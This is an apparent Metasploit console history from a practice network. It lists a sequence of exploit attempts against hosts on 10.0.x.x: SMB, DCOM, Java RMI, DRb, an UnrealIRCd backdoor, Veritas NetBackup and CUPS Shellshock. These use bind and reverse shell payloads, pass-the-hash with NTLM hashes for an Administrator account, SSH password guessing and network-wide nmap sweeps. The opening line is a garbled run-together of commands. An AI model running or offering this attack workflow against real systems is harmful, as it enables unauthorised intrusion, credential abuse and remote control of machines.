use exploit/windows/smb/ms06_040_netapiset RHOST 10.0.1.70set TARGET 5use

1. use exploit/windows/smb/ms06_040_netapi
2. set RHOST 10.0.1.70
3. set TARGET 5
4. use payload windows/meterpreter/bind_tcp
5. set payload windows/meterpreter/bind_tcp
6. exploit
7. exploit
8. show options
9. connect
10. info exploit/windows/smb/ms06_040_netapi
11. exploit
12. use exploit/windows/dcerpc/ms03_026_dcom
13. set RHOST 10.0.1.70
14. set PAYLOAD windows/shell_bind_tcp
15. exploit -j
16. sessions
17. sessions -i 1
18. sessions -i 1
19. sessions
20. exploit
21. use exploit/windows/dcerpc/ms03_026_dcom
22. set RHOST 10.0.1.65
23. set RPORT 135
24. show options
25. exploit
26. sessions -i 1
27. sessions
28. exploit -i
29. show options
30. exploit
31. show targets
32. set SMBUser Administrator
33. set SMBPass c6100ace80e48267b3cc7c3990963222:e36724ee23318dcf3a8c4a3865764d24
34. search smb_login
35. use auxiliary/scanner/smb/smb_login
36. options
37. show options
38. set rhosts 10.0.1.60
39. run
40. set SMBUser Administrator
41. set SMBPass
42. set SMBPass c6100ace80e48267b3cc7c3990963222:e36724ee23318dcf3a8c4a3865764d24
43. set rhosts 10.0.1.60
44. search smb_login
45. db_status
46. db_rebuild_cache
47. db_rebuild_cache
48. db_status
49. use exploit/multi/misc/java_rmi_server
50. set rhosts 10.0.1.60
51. set rport 1099
52. set payload java/shell/bind_tcp
53. exploit
54. set rhost 10.0.1.60
55. exploit
56. use exploit/multi/misc/java_rmi_server
57. set RHOST 10.0.1.60
58. exploit
59. unset payload
60. unset rport
61. exploit
62. show options
63. exit
64. use exploit/multi/misc/java_rmi_server
65. set RHOST 10.0.1.60
66. exploit
67. unset
68. unset -g rhost
69. unset -g
70. unset
71. back
72. use exploit/multi/misc/java_rmi_server
73. set RHOST 10.0.1.60
74. exploit
75. use exploit/linux/misc/drb_remote_codeexec
76. options
77. set payload cmd/unix/bind_netcat
78. set URI druby://10.0.1.60:8787
79. show options
80. set RHOST 10.0.1.60
81. exploit
82. use exploit/unix/irc/unreal_ircd_3281_backdoor
83. set RHOST 10.0.1.50
84. set rport 6667
85. set payload cmd/unix/bind_ruby
86. exploit
87. back
88. search netbackup
89. use exploit/multi/misc/veritas_netbackup_cmdexec 2004-10-21 excellent VERITAS NetBackup
90. set lport 6666
91. run
92. set rhost 10.0.1.41
93. set rport 6666
94. run
95. show options
96. set target 0
97. show options
98. show options
99. exploit
100. back
101. set rport 6666
102. set rhost 10.0.1.41
103. use exploit/multi/misc/veritas_netbackup_cmdexec 2004-10-21 excellent VERITAS NetBackup
104. use exploit/multi/misc/veritas_netbackup_cmdexec
105. exploit
106. set rport 13782
107. exploit
108. use exploit/unix/irc/unreal_ircd_3281_backdoor
109. set RHOST 10.0.1.41
110. set RPORT
111. set PAYLOAD generic/shell_bind_tcp
112. set PAYLOAD generic/shell_bind_tcp
113. show options
114. show info
115. set PAYLOAD cmd/unix/bind_netcat
116. set PAYLOAD cmd/unix/generic
117. exploit
118. show options
119. set PAYLOAD cmd/unix/reverse
120. show options
121. show
122. use exploit/multi/misc/veritas_netbackup_cmdexec
123. help
124. set
125. set rhost 10.0.1.41
126. show targets
127. check
128. set rport 6666
129. check
130. exploit
131. back
132. show
133. search ftp
134. db_status
135. db_status
136. exit
137. search ftppp
138. use exploit/unix/irc/unreal_ircd_3281_backdoor
139. show options
140. set rhost 10.0.1.41
141. set rport 6666
142. set lhost 192.168.56.102
143. set lport 12345
144. show payload
145. show payloads
146. set payload cmd/unix/bind_perl
147. exploit
148. exploit
149. rexploit
150. rcheck
151. rexploit
152. search sshv1
153. search cups
154. use post/multi/escalate/cups_root_file_read
155. show options
156. set rhost 10.0.1.41
157. set rport 631
158. exploit
159. use exploit/multi/http/cups_bash_env_exec
160. show options
161. set rhost 10.0.1.41
162. exploit
163. show payloads
164. set payload cmd/unix/generic
165. exploit
166. set payload cmd/unix/bind_ruby
167. exploit
168. search ssh
169. use exploit/multi/ssh/sshexec
170. show options
171. set rhost 10.0.1.41
172. exploit
173. set password
174. exploit
175. set password ''
176. exploit
177. set password 123
178. exploit
179. back
180. search irc
181. use exploit/unix/irc/unreal_ircd_3281_backdoor
182. set rhost 10.0.1.35
183. set rport 631
184. show opitons
185. show options
186. exploit
187. exploit -j
188. sessions
189. use exploit/windows/dcerpc/ms03_026_dcom
190. set LHOST 10.0.2.15
191. set RPORT 135
192. set RHOST 10.0.2.70
193. set LHOST 10.0.2.6
194. set PAYLOAD windows/meterpreter/bind_tcp
195. set TARGET 0
196. exploit
197. set RHOST 10.0.1.70
198. exploit
199. db_nmap -v -SV 10.0.0.0/16
200. hosts
201. db_nmap -v -sV 10.0.0.0/24
202. hosts
203. db_nmap -v -sV 10.0.1.0/24
204. hosts
205. db_nmap -v -sV 10.0.2.0/24
206. hosts
207. db_nmap -v -sV 10.0.3.0/24
208. hosts
209. db_nmap -v -sV 10.0.4.0/24
210. hosts
211. db_nmap -v -sV 10.0.5.0/24
212. db_nmap -v -sV 10.0.6.0/24
213. db_nmap -v -sV 10.0.7.0/24
214. db_nmap -v -sV 10.0.8.0/24
215. hosts
216. db_nmap -v -sV 10.0.9.0/24
217. hosts
218. hosts
219. db_nmap -v -sV 10.0.1.0/24
220. hosts
221. db_nmap -sP 10.0.1.0/24
222. hosts
223. cd ÂŽ~/
224. help
225. version
226. cd ÂÂ~/.msf4/
227. color
228. color true
229. help ?
230. exit
231. cd usr
232. cd /usr/
233. cd share
234. cd metasploit-framework
235. exit
236. help